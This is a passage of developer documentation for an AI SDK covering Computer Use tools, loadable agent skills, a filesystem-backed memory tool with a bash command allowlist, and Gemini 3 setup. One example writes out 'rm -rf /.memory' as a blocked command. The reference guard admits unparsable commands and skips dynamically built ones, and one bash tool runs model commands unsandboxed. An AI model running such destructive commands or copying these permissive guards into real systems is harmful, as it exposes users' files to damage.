Now when users submit queries, the application will:
- Generate and run the SQL query
- Display the table results
- Generate a chart configuration for the results
- Allow toggling between table and chart views
Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.
Next steps
You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.
You could, for example, extend the application to use your own data sources or add more advanced features like customizing the chart configuration schema to support more chart types and options. You could also add more complex SQL query generation capabilities.
---
title: Get started with Computer Use
description: Get started with Claude's Computer Use capabilities with the AI SDK
tags: ['computer-use', 'tools']
---
Get started with Computer Use
With the release of Computer Use in Claude 3.5 Sonnet, you can now direct AI models to interact with computers like humans do - moving cursors, clicking buttons, and typing text. This capability enables automation of complex tasks while leveraging Claude's advanced reasoning abilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Anthropic's Claude alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more. In this guide, you will learn how to integrate Computer Use into your AI SDK applications.
Computer Use
Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:
- Moving the cursor
- Clicking buttons
- Typing text
- Taking screenshots
- Reading screen content
How It Works
Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:
1. Start with a prompt and tools: Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
2. Select the right tool: The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
3. Execute the action and return results: The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
4. Complete the task through iterations: Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.
Available Tools
There are three main tools available in the Computer Use API:
- Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
- Text Editor Tool: Provides functionality for viewing and editing text files
- Bash Tool: Allows execution of bash commands
Implementation Considerations
Computer Use tools in the AI SDK are predefined interfaces that require your own implementation of the execution layer. While the SDK provides the type definitions and structure for these tools, you need to:
- Set up a controlled environment for Computer Use execution
- Implement core functionality like mouse control and keyboard input
- Handle screenshot capture and processing
- Set up rules and limits for how Claude can interact with your system
The recommended approach is to start with Anthropic's reference implementation, which provides:
- A containerized environment configured for safe Computer Use
- Ready-to-use (Python) implementations of Computer Use tools
- An agent loop for API interaction and tool execution
- A web interface for monitoring and control
This reference implementation serves as a foundation to understand the requirements before building your own custom solution.
Getting Started with the AI SDK
First, ensure you have the AI SDK and Anthropic AI SDK provider installed:
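For example, with pnpm:
pnpm add ai @ai-sdk/anthropic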
You can add Computer Use to your AI SDK applications using provider-defined client tools. These tools accept various input parameters (like display height and width in the case of the computer tool) and then require that you define an execute function.
Here's how you could set up the Computer Tool with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';
const computerTool = anthropic.tools.computer_20250124({
displayWidthPx: 1920,
displayHeightPx: 1080,
execute: async ({ action, coordinate, text }) => {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: getScreenshot(),
};
}
default: {
return executeComputerAction(action, coordinate, text);
}
}
},
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
The computerTool handles two main actions: taking screenshots via getScreenshot() and executing computer actions like mouse movements and clicks through executeComputerAction(). Remember, you have to implement this execution logic (e.g. the getScreenshot and executeComputerAction functions) to handle the actual computer interactions. The execute function should handle all low-level interactions with the operating system.
Finally, to send tool results back to the model, use the toModelOutput() function to convert text and image responses into a format the model can process. The AI SDK includes experimental support for these multi-modal tool results when using Anthropic's models.
Using Computer Tools with Text Generation
Once your tool is defined, you can use it with both the generateText and streamText functions.
For one-shot text generation, use generateText:
const result = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Move the cursor to the center of the screen and take a screenshot',
tools: { computer: computerTool },
});
console.log(result.text);
For streaming responses, use streamText to receive updates in real-time:
const result = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Configure Multi-Step (Agentic) Generations
To allow the model to perform multiple steps without user intervention, use the stopWhen parameter. This will automatically send any tool results back to the model to trigger a subsequent generation:
import { stepCountIs } from 'ai';
const stream = streamText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: 'Open the browser and navigate to vercel.com',
tools: { computer: computerTool },
stopWhen: stepCountIs(10), // experiment with this value based on your use case
});
Combine Multiple Tools
You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:
const computerTool = anthropic.tools.computer_20250124({
...
});
const bashTool = anthropic.tools.bash_20250124({
  // execSync comes from node:child_process; swap in your own sandboxed runner
  execute: async ({ command, restart }) => execSync(command).toString(),
});
const textEditorTool = anthropic.tools.textEditor_20250124({
execute: async ({
command,
path,
file_text,
insert_line,
new_str,
insert_text,
old_str,
view_range
}) => {
// Handle file operations based on command
return executeTextEditorFunction({
  command,
  path,
  fileText: file_text,
  insertLine: insert_line,
  newStr: new_str,
  insertText: insert_text,
  oldStr: old_str,
  viewRange: view_range,
});
}
});
const response = await generateText({
model: 'anthropic/claude-sonnet-4-20250514',
prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
tools: {
computer: computerTool,
bash: bashTool,
str_replace_editor: textEditorTool,
},
});
Best Practices for Computer Use
To get the best results when using Computer Use:
- Specify simple, well-defined tasks with explicit instructions for each step
- Prompt Claude to verify outcomes through screenshots
- Use keyboard shortcuts when UI elements are difficult to manipulate
- Include example screenshots for repeatable tasks
- Provide explicit tips in system prompts for known tasks
Security Measures
Remember, Computer Use is a beta feature. Please be aware that it poses unique risks that are distinct from standard API features or chat interfaces. These risks are heightened when using Computer Use to interact with the internet. To minimize risks, consider taking precautions such as:
- Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
- Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
- Limit internet access to an allowlist of domains to reduce exposure to malicious content.
- Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.
---
title: Add Skills to Your Agent
description: Learn how to extend your agent with specialized capabilities loaded at runtime with Agent Skills.
tags: ['agent', 'skills', 'tools', 'extensibility']
---
Add Skills to Your Agent
In this guide, you will learn how to extend your agent with Agent Skills, a lightweight, open format for adding specialized knowledge and workflows that load at runtime from markdown files.
At its core, a skill is a folder containing a SKILL.md file with metadata and instructions that tell an agent how to perform a specific task.
my-skill/
├── SKILL.md # Required: instructions + metadata
├── scripts/ # Optional: executable code
├── references/ # Optional: documentation
└── assets/ # Optional: templates, resources
How Skills Work
Skills use progressive disclosure to manage context efficiently:
- Discovery: At startup, agents load only the name and description of each available skill (just enough to know when it might be relevant)
- Activation: When a task matches a skill's description, the agent reads the full SKILL.md instructions into context
- Execution: The agent follows the instructions, optionally loading referenced files or executing bundled code as needed
This approach keeps agents fast while giving them access to more context on demand.
The SKILL.md File
Every skill starts with a SKILL.md file containing YAML frontmatter and Markdown instructions:
---
name: pdf-processing
description: Extract text and tables from PDF files, fill forms, merge documents.
---
# PDF Processing
## When to use this skill
Use this skill when the user needs to work with PDF files...
## How to extract text
1. Use pdfplumber for text extraction...
## How to fill forms
...
The frontmatter requires:
- name: A short identifier
- description: Instructions for when to use this skill
The Markdown body contains the actual skill content with no restrictions on structure or content.
Prerequisites
To support skills, your agent needs:
- Filesystem access to discover and load skill files (read files, read directories)
- A load skill tool that reads the SKILL.md content into context
- Command execution (optional) if skills bundle scripts (e.g. a full sandbox environment)
Step 1: Define a Sandbox Abstraction
Create a generic sandbox interface that provides a consistent way to interact with the filesystem. This abstraction lets you implement it differently depending on your environment (Node.js fs, a containerized sandbox, cloud storage, etc.):
interface Sandbox {
readFile(path: string, encoding: 'utf-8'): Promise<string>;
readdir(
path: string,
opts: { withFileTypes: true },
): Promise<{ name: string; isDirectory(): boolean }[]>;
exec(command: string): Promise<{ stdout: string; stderr: string }>;
}
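For local development, you could satisfy this interface with Node.js built-ins. Below is a minimal sketch (the createNodeSandbox helper is illustrative, not part of the guide's API):
import { promises as fs } from 'node:fs';
import { exec } from 'node:child_process';
import { promisify } from 'node:util';
const execAsync = promisify(exec);
// Minimal Sandbox backed by the real filesystem and shell (use with care)
function createNodeSandbox(): Sandbox {
  return {
    readFile: (path, encoding) => fs.readFile(path, encoding),
    readdir: (path, opts) => fs.readdir(path, opts),
    exec: async command => {
      const { stdout, stderr } = await execAsync(command);
      return { stdout, stderr };
    },
  };
}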
Step 2: Discover Skills at Startup
Scan skill directories and extract metadata from each SKILL.md:
interface SkillMetadata {
name: string;
description: string;
path: string;
}
async function discoverSkills(
sandbox: Sandbox,
directories: string[],
): Promise<SkillMetadata[]> {
const skills: SkillMetadata[] = [];
const seenNames = new Set<string>();
for (const dir of directories) {
let entries;
try {
entries = await sandbox.readdir(dir, { withFileTypes: true });
} catch {
continue; // Skip directories that don't exist
}
for (const entry of entries) {
if (!entry.isDirectory()) continue;
const skillDir = `${dir}/${entry.name}`;
const skillFile = `${skillDir}/SKILL.md`;
try {
const content = await sandbox.readFile(skillFile, 'utf-8');
const frontmatter = parseFrontmatter(content);
// First skill with a given name wins (allows project overrides)
if (seenNames.has(frontmatter.name)) continue;
seenNames.add(frontmatter.name);
skills.push({
name: frontmatter.name,
description: frontmatter.description,
path: skillDir,
});
} catch {
continue; // Skip skills without valid SKILL.md
}
}
}
return skills;
}
function parseFrontmatter(content: string) {
const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
if (!match?.[1]) throw new Error('No frontmatter found');
// Parse YAML using your preferred library
return yaml.parse(match[1]);
}
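The parseFrontmatter helper assumes a YAML parser is in scope; for example, import * as yaml from 'yaml'; from the yaml package provides the yaml.parse call used above.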
Step 3: Build the System Prompt
Include discovered skills in the system prompt so the agent knows what's available:
function buildSkillsPrompt(skills: SkillMetadata[]): string {
const skillsList = skills
.map(s => `- ${s.name}: ${s.description}`)
.join('\n');
return `
## Skills
Use the \`loadSkill\` tool to load a skill when the user's request
would benefit from specialized instructions.
Available skills:
${skillsList}
`;
}
The agent sees only names and descriptions. Full instructions stay out of the context window until loaded.
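For example, with the pdf-processing skill from earlier, the model's system prompt would contain only:
Available skills:
- pdf-processing: Extract text and tables from PDF files, fill forms, merge documents.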
Step 4: Create the Load Skill Tool
The load skill tool reads the full SKILL.md and returns the body (without frontmatter):
function stripFrontmatter(content: string): string {
const match = content.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
return match ? content.slice(match[0].length).trim() : content.trim();
}
const loadSkillTool = tool({
description: 'Load a skill to get specialized instructions',
inputSchema: z.object({
name: z.string().describe('The skill name to load'),
}),
execute: async ({ name }, { experimental_context }) => {
const { sandbox, skills } = experimental_context as {
sandbox: Sandbox;
skills: SkillMetadata[];
};
const skill = skills.find(s => s.name.toLowerCase() === name.toLowerCase());
if (!skill) {
return { error: `Skill '${name}' not found` };
}
const skillFile = `${skill.path}/SKILL.md`;
const content = await sandbox.readFile(skillFile, 'utf-8');
const body = stripFrontmatter(content);
return {
skillDirectory: skill.path,
content: body,
};
},
});
The tool returns the skill directory path alongside the content so the agent can construct full paths to bundled resources.
Step 5: Create the Agent
Wire up the sandbox and skills using callOptionsSchema and prepareCall:
const callOptionsSchema = z.object({
sandbox: z.custom<Sandbox>(),
skills: z.array(
z.object({
name: z.string(),
description: z.string(),
path: z.string(),
}),
),
});
const readFileTool = tool({
description: 'Read a file from the filesystem',
inputSchema: z.object({ path: z.string() }),
execute: async ({ path }, { experimental_context }) => {
const { sandbox } = experimental_context as { sandbox: Sandbox };
return sandbox.readFile(path, 'utf-8');
},
});
const bashTool = tool({
description: 'Execute a bash command',
inputSchema: z.object({ command: z.string() }),
execute: async ({ command }, { experimental_context }) => {
const { sandbox } = experimental_context as { sandbox: Sandbox };
return sandbox.exec(command);
},
});
const agent = new ToolLoopAgent({
model: yourModel,
tools: {
loadSkill: loadSkillTool,
readFile: readFileTool,
bash: bashTool,
},
callOptionsSchema,
prepareCall: ({ options, ...settings }) => ({
...settings,
instructions: `${settings.instructions}\n\n${buildSkillsPrompt(options.skills)}`,
experimental_context: {
sandbox: options.sandbox,
skills: options.skills,
},
}),
});
Step 6: Run the Agent
// Create sandbox (your filesystem/execution abstraction)
const sandbox = createSandbox({ workingDirectory: process.cwd() });
// Discover skills at startup
const skills = await discoverSkills(sandbox, [
'.agents/skills',
'~/.config/agent/skills',
]);
// Run the agent
const result = await agent.run({
prompt: userMessage,
options: { sandbox, skills },
});
When a user asks something that matches a skill description, the agent calls loadSkill. The full instructions load into context, and the agent follows them using bash and readFile to access bundled resources.
Accessing Bundled Resources
Skills can reference files relative to their directory. The agent uses existing tools to access them:
Skill directory: /path/to/.agents/skills/my-skill
# My Skill Instructions
Read the configuration template:
templates/config.json
Run the setup script:
bash scripts/setup.sh
The agent sees the skill directory path in the tool result and prepends it when accessing templates/config.json or scripts/setup.sh. No special resource loading mechanism is needed—the agent uses the same tools it uses for everything else.
Learn More
- Agent Skills specification for the full format details
- Example skills on GitHub
- Authoring best practices for writing effective skills
- Reference library to validate skills and generate prompt XML
- skills.sh to browse and discover community skills
---
title: Build a Custom Memory Tool
description: Build an agent that persists memories using a filesystem-backed memory tool.
---
Build a Custom Memory Tool
Memory means saving the right information at the right time, in the right place, and injecting it back into the conversation when it matters. Without memory, your agent treats every conversation as its first. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.
The Storage Primitive: The Filesystem
Where should you store memories? Files organized in a filesystem-like structure are a natural fit:
- Persistence: you can persist files across process restarts and conversations
- Speed: reading and writing files is fast, even at scale
- Familiarity: language models understand files and paths from their training data
- Hierarchy: you can use a directory structure to create deep and organized memory banks, grouping memories by topic, time, or type
The key insight is that "filesystem" here is an abstraction. The backing store does not matter. You could use a real sandboxed filesystem, an in-memory virtual filesystem, or a shim over Postgres. What matters is the concept: files organized in a hierarchical structure, and an interface that can manipulate, search, read, and edit those files. That is the primitive.
The Interface: A Memory Tool
You have files. Now the model needs to interact with them. You give the model a tool, along with instructions for when and how to use it. There are two approaches:
Structured Actions Tool
Define explicit actions the model can take (view, create, update, search) and have the model generate structured input that you handle yourself:
{
"name": "memory",
"input": {
"command": "view",
"path": "/memories/customer_service_guidelines.xml"
}
}
This is safe by design since you control every operation that runs. However, it requires more upfront implementation and limits the model to only the actions you have built.
Bash-Backed Tool
The alternative is to back the memory tool with bash. Models are proficient at composing shell commands, which lets them craft flexible queries to access what they need: cat a file, grep for patterns, pipe commands together, or perform in-place edits with sed. This is the more powerful approach, but it requires careful work to build an approval system that prevents prompt injection and blocks dangerous commands.
Types of Memory
Not all memories are equal. They differ in how you store them, how often the model accesses them, and when they surface:
- Core Memory: information included in every turn. This can range from the user's name to instructions for where to find other memories. You inject core memory directly into the system prompt, so the model always has it without needing a tool call.
- Archival Memory: a notes folder or file where the model stores detailed knowledge. Think of it as the model's notebook, where it writes down facts, summaries, and observations for later. The model reads and writes archival memory on demand through the memory tool.
- Recall Memory: the conversations themselves. By persisting full turn-by-turn history, the model can search previous interactions to surface relevant context from past discussions.
These memory terms are based on Letta's definitions.
What We Will Build
This recipe is a simplified demonstration of these concepts. You build one memory tool over a shared .memory store, then wire it into an agent with prepareCall so core memory is injected before each model call. You can implement the tool with structured actions or with a bash-backed interface.
The memory layout is a .memory directory with three files, each mapping to one of the memory types above:
.memory/
├── core.md # Core memory, injected every turn
├── notes.md # Archival memory, timestamped notes
└── conversations.jsonl # Recall memory, full turn history (JSONL)
Prerequisites
To follow this guide, you need the following:
- AI SDK with ToolLoopAgent and tool
- Zod for tool input schemas
- Optional for Route B (bash-backed): just-bash for command execution and AST parsing
Install dependencies for both routes:
pnpm add ai just-bash zod
If you only use Route A (structured actions), you can skip just-bash.
Implementation Requirements
Before building the agent, you need shared infrastructure plus one route-specific piece:
- Bootstrap the filesystem. On startup, ensure the memory directory and its files exist with reasonable defaults. This is a one-time setup step: create the directory if missing, seed each file with starter content if it does not already exist, and add the memory directory to .gitignore to keep it local and private.
- Helper functions for core memory and conversation logging. You need a way to read core memory (so you can inject it into the system prompt) and a way to append conversation entries. Conversations are stored as JSONL (one JSON object per line), which makes them straightforward to grep for keywords and pipe through jq for formatting.
- Route-specific execution safety.
  - Route A (structured actions): keep the action set small and explicit (view, create, update, search) and only operate on known .memory paths.
  - Route B (bash-backed): validate commands before execution. Users can craft prompts that try to run harmful commands, so use AST-based validation and an allowlist. See the Appendix for a full implementation with just-bash.
Step 1: Define the Memory Tool
Choose your tool interface first. Both routes use the same .memory files, the same prepareCall injection pattern, and the same conversation logging. The only difference is how the model issues memory operations.
Route A: Structured Actions Tool
Use this when you want predictable, explicit operations (view, create, update, search) and minimal command-safety surface.
Define a schema and route every request through your own runMemoryCommand handler:
import { tool } from 'ai';
import { z } from 'zod';
const memoryInputSchema = z.object({
command: z
.enum(['view', 'create', 'update', 'search'])
.describe(
'Memory action: view to read, create to write new content, update to change existing content, search to find relevant lines.',
),
path: z
.string()
.optional()
.describe(
'Memory path under /memories, such as /memories/core.md or /memories/notes.md. Required for view, create, and update.',
),
content: z
.string()
.optional()
.describe('Text to write for create or update commands.'),
mode: z
.enum(['append', 'overwrite'])
.optional()
.describe(
'Write mode for update: append adds to existing content, overwrite replaces it. Defaults to overwrite.',
),
query: z
.string()
.optional()
.describe(
'Search keywords for the search command. Prefer short focused terms.',
),
});
const memoryTool = tool({
description: `Use this tool to read and maintain long-term memory under /memories.
Rules:
- If the user prompt might depend on preferences, history, constraints, or goals, search first, then reply.
- If the prompt is fully self-contained or general knowledge, reply directly.
- Keep searches short and focused (1-4 words).
- Store durable user facts in /memories/core.md and detailed notes in /memories/notes.md.
- Keep memory operations invisible in user-facing replies.`,
inputSchema: memoryInputSchema,
execute: async input => {
try {
const output = await runMemoryCommand(input);
return { output };
} catch (error) {
return { output: `Memory action failed: ${(error as Error).message}` };
}
},
});
This keeps memory operations predictable because the model can only call predefined actions.
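For instance, when the user asks "what editor do I like again?", the model might issue a tool call like:
{
  "command": "search",
  "query": "favorite editor"
}
and your runMemoryCommand handler scans the known memory files for matching lines.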
Route B: Bash-Backed Tool
Use this when you want maximum flexibility in reads, writes, and ad-hoc search.
import { tool } from 'ai';
import { Bash, ReadWriteFs } from 'just-bash';
import { z } from 'zod';
const fs = new ReadWriteFs({ root: process.cwd() });
const bash = new Bash({ fs, cwd: '/' });
const memoryTool = tool({
description: `Run bash commands only for memory-related tasks.
This tool is restricted to memory workflows. Do not use it for
general project work, code changes, dependency management, or
system administration.
Inside the tool, use paths under /.memory:
- /.memory/core.md for key facts that should be reused later
- /.memory/notes.md for detailed notes
- /.memory/conversations.jsonl for full turn history
Rules:
- Only perform memory-related reads/writes and conversation recall
- Keep /.memory/core.md short and focused
- Prefer append-friendly notes in /.memory/notes.md for details
- If the user asks about prior conversations, search
/.memory/conversations.jsonl for relevant keywords first
- Use >> to append, > to overwrite, and perl -pi -e for in-place edits
Examples:
- cat /.memory/core.md
- echo "- User prefers concise answers" >> /.memory/core.md
- perl -pi -e 's/concise answers/detailed answers/g' /.memory/core.md
- grep -n "project" /.memory/notes.md
- echo "2026-02-16: started a Rust CLI" >> /.memory/notes.md
- grep -niE "pricing|budget" /.memory/conversations.jsonl
- tail -n 40 /.memory/conversations.jsonl | jq -c '.role + ": " + .content'`,
inputSchema: z.object({
command: z.string().describe('The bash command to execute.'),
}),
execute: async ({ command }) => {
const unapprovedCommand = findUnapprovedCommand(command);
if (unapprovedCommand) {
return {
stdout: '',
stderr: `Blocked unapproved command: ${unapprovedCommand}\n`,
exitCode: 1,
};
}
const result = await bash.exec(command);
return {
stdout: result.stdout,
stderr: result.stderr,
exitCode: result.exitCode,
};
},
});
ReadWriteFs reads and writes directly to the real filesystem, rooted at process.cwd(). Paths inside the bash interpreter map directly to disk: /.memory/core.md resolves to <project-root>/.memory/core.md.
The safety pipeline has two layers: the AST-based command guard rejects unapproved commands before they reach the interpreter, and just-bash itself is a JavaScript-based bash implementation (it does not spawn a real shell process). While the bash interpreter runs in JavaScript, the filesystem is real and commands read and write actual files on disk. This is why the command guard is critical.
The rest of this recipe (agent wiring, prepareCall, and run loop) works for either route.
Step 2: Create the Agent
Wire everything together with ToolLoopAgent. The prepareCall hook reads core memory fresh before every LLM call and injects it into the system prompt:
import { ToolLoopAgent } from 'ai';
const today = new Date().toISOString().slice(0, 10);
const memoryAgent = new ToolLoopAgent({
model: 'anthropic/claude-haiku-4.5',
tools: { memory: memoryTool },
prepareCall: async settings => {
// user-defined function fetches the contents of /.memory/core.md on every turn
const coreMemory = await readCoreMemory();
return {
...settings,
instructions: `Today's date is ${today}.
Core memory:
${coreMemory}
You can save and recall important information using the memory tool.`,
};
},
});
Because prepareCall runs before each generate call in the tool loop, the system prompt always reflects the latest state of core.md. If the model updates core memory during a conversation, the next loop iteration sees the change immediately.
Step 3: Run the Agent
Bootstrap the filesystem, record conversations, and run the agent:
const prompt = 'Remember that my favorite editor is Neovim';
// Record the user message
await appendConversation({
role: 'user',
content: prompt,
timestamp: new Date().toISOString(),
});
// Run the agent (loops automatically on tool calls)
const result = await memoryAgent.generate({ prompt });
// Record the assistant response
await appendConversation({
role: 'assistant',
content: result.text,
timestamp: new Date().toISOString(),
});
console.log(result.text);
When the model decides it needs to store or recall information, it calls the memory tool. The ToolLoopAgent executes the tool and feeds the result back, continuing until the model produces a final text response.
A typical interaction looks like this:
- User says "Remember that my favorite editor is Neovim"
- The model calls memory with echo "- Favorite editor: Neovim" >> /.memory/core.md
- The tool executes the command and returns the result
- The model responds: "Got it, I've saved that your favorite editor is Neovim."
- On the next run, prepareCall reads core.md and the fact appears in the system prompt
Learn More
- AI SDK documentation for ToolLoopAgent, tool, and generateText
- AI SDK examples for more agent patterns
Appendix: Implementation Details
The code below is the reference implementation for the infrastructure described in Implementation Requirements. It uses Node.js filesystem APIs and a Bun entrypoint, but you can port the patterns to any runtime.
Appendix: Filesystem Bootstrap
Define the memory directory structure and bootstrap it on startup. Each file gets reasonable defaults if it does not already exist:
import {
access,
appendFile,
mkdir,
readFile,
writeFile,
} from 'node:fs/promises';
import { join, resolve } from 'node:path';
const MEMORY_DIR = '.memory';
const MEMORY_ROOT = resolve(process.cwd(), MEMORY_DIR);
const CORE_MEMORY_PATH = join(MEMORY_ROOT, 'core.md');
const NOTES_PATH = join(MEMORY_ROOT, 'notes.md');
const CONVERSATIONS_PATH = join(MEMORY_ROOT, 'conversations.jsonl');
const DEFAULT_CORE_MEMORY = `# Core Memory
- Keep this short.
- Put stable user facts here.
`;
const DEFAULT_NOTES = `# Notes
Use this file for detailed memories and timestamped notes.
`;
async function ensureFile(path: string, content: string): Promise<void> {
try {
await access(path);
} catch {
await writeFile(path, content, 'utf8');
}
}
async function ensureMemoryFilesystem(): Promise<void> {
await mkdir(MEMORY_ROOT, { recursive: true });
await ensureFile(CORE_MEMORY_PATH, DEFAULT_CORE_MEMORY);
await ensureFile(NOTES_PATH, DEFAULT_NOTES);
await ensureFile(CONVERSATIONS_PATH, '');
}
Add .memory to your .gitignore to keep memory local and private.
Appendix: Helper Functions
One helper reads core memory for system prompt injection, the other appends conversation entries as JSONL:
async function readCoreMemory(): Promise<string> {
try {
return await readFile(CORE_MEMORY_PATH, 'utf8');
} catch {
return '';
}
}
async function appendConversation(entry: {
role: 'user' | 'assistant';
content: string;
timestamp: string;
}): Promise<void> {
await appendFile(CONVERSATIONS_PATH, `${JSON.stringify(entry)}\n`, 'utf8');
}
Appendix: Structured Actions Handler
The runMemoryCommand function used in Route A maps each action to a filesystem operation. Paths are resolved relative to the memory root, and only known memory files are allowed:
import { readFile, writeFile, appendFile } from 'node:fs/promises';
import { join, relative } from 'node:path';
const MEMORY_FILES = ['core.md', 'notes.md', 'conversations.jsonl'];
function resolveMemoryPath(path: string): string {
const relativePath = path
.trim()
.replace(/^\/?memories\/?/, '')
.replace(/^\/?\.memory\/?/, '')
.replace(/^\/+/, '');
if (!MEMORY_FILES.includes(relativePath)) {
throw new Error(`Unsupported memory path: ${path}`);
}
return join(MEMORY_ROOT, relativePath);
}
async function runMemoryCommand(input: {
command: 'view' | 'create' | 'update' | 'search';
path?: string;
content?: string;
mode?: 'append' | 'overwrite';
query?: string;
}): Promise<string> {
const { command, path, content, mode, query } = input;
switch (command) {
case 'view': {
if (!path) throw new Error('path is required for view');
return await readFile(resolveMemoryPath(path), 'utf8');
}
case 'create':
case 'update': {
if (!path) throw new Error('path is required');
if (!content) throw new Error('content is required');
const target = resolveMemoryPath(path);
if (mode === 'append') {
await appendFile(target, content, 'utf8');
} else {
await writeFile(target, content, 'utf8');
}
return `${command === 'create' ? 'Created' : 'Updated'} ${path}`;
}
case 'search': {
if (!query) throw new Error('query is required for search');
const terms = query.toLowerCase().split(/\s+/).filter(Boolean);
const files = path
? [resolveMemoryPath(path)]
: MEMORY_FILES.map(f => join(MEMORY_ROOT, f));
const matches: string[] = [];
for (const filePath of files) {
const lines = (await readFile(filePath, 'utf8')).split('\n');
for (const [i, line] of lines.entries()) {
const lower = line.toLowerCase();
if (terms.some(t => lower.includes(t))) {
matches.push(`${relative(MEMORY_ROOT, filePath)}:${i + 1}:${line}`);
}
}
}
return matches.length > 0 ? matches.join('\n') : 'No matches found.';
}
}
}
Appendix: Command Guard
The AST-based command guard walks every node in the parsed command (including pipelines, subshells, loops, and conditionals) and rejects anything not in the allowlist. This is more robust than string matching or regex. If a command name is dynamically constructed (e.g., via variable expansion), extractLiteralWord returns null and the guard skips the allowlist check for that command. Since just-bash is a JavaScript-based interpreter (not a real shell), dynamically constructed commands that bypass the allowlist check fail to resolve to real binaries. This is an acceptable tradeoff.
import {
type CommandNode,
parse,
type ScriptNode,
type WordNode,
} from 'just-bash';
const approvedCommands = new Set([
'cat',
'echo',
'grep',
'jq',
'ls',
'mkdir',
'perl',
'sed',
'tail',
]);
function extractLiteralWord(word: WordNode | null): string | null {
if (!word || word.parts.length !== 1) return null;
const [part] = word.parts;
if (!part || part.type !== 'Literal') return null;
return part.value;
}
function collectCommandNames(script: ScriptNode): string[] {
const names = new Set<string>();
const visitCommand = (command: CommandNode): void => {
switch (command.type) {
case 'SimpleCommand': {
const name = extractLiteralWord(command.name);
if (name) names.add(name);
break;
}
case 'If': {
for (const clause of command.clauses) {
for (const s of clause.condition) visitStatement(s);
for (const s of clause.body) visitStatement(s);
}
if (command.elseBody) {
for (const s of command.elseBody) visitStatement(s);
}
break;
}
case 'For':
case 'CStyleFor':
case 'While':
case 'Until':
case 'Subshell':
case 'Group': {
for (const s of command.body) visitStatement(s);
break;
}
case 'Case': {
for (const item of command.items) {
for (const s of item.body) visitStatement(s);
}
break;
}
case 'FunctionDef': {
visitCommand(command.body);
break;
}
case 'ArithmeticCommand':
case 'ConditionalCommand':
break;
}
};
const visitStatement = (
statement: ScriptNode['statements'][number],
): void => {
for (const pipeline of statement.pipelines) {
for (const command of pipeline.commands) {
visitCommand(command);
}
}
};
for (const statement of script.statements) {
visitStatement(statement);
}
return [...names].sort();
}
export function findUnapprovedCommand(commandLine: string): string | null {
let script: ScriptNode;
try {
script = parse(commandLine);
} catch {
return null;
}
const commandNames = collectCommandNames(script);
return commandNames.find(name => !approvedCommands.has(name)) ?? null;
}
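For instance (illustrative inputs), the guard lets memory workflows through while rejecting anything outside the allowlist:
findUnapprovedCommand('grep -n "project" /.memory/notes.md'); // null (grep is approved)
findUnapprovedCommand('rm -rf /.memory'); // 'rm' (blocked)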
---
title: Get started with Gemini 3
description: Get started with Gemini 3 using the AI SDK.
tags: ['getting-started']
---
Get started with Gemini 3
With the release of Gemini 3, Google's most intelligent model to date, there has never been a better time to start building AI applications that combine state-of-the-art reasoning with multimodal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Gemini 3 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Gemini 3
Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:
- State-of-the-art reasoning with unprecedented depth and nuance
- PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
- Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
- Best-in-class vibe coding and agentic capabilities
- Superior long-horizon planning for multi-step workflows
Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);
Enhanced Reasoning with Thinking Mode
Gemini 3 models can use enhanced reasoning through thinking mode, which improves their ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
includeThoughts: true,
thinkingLevel: 'low',
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
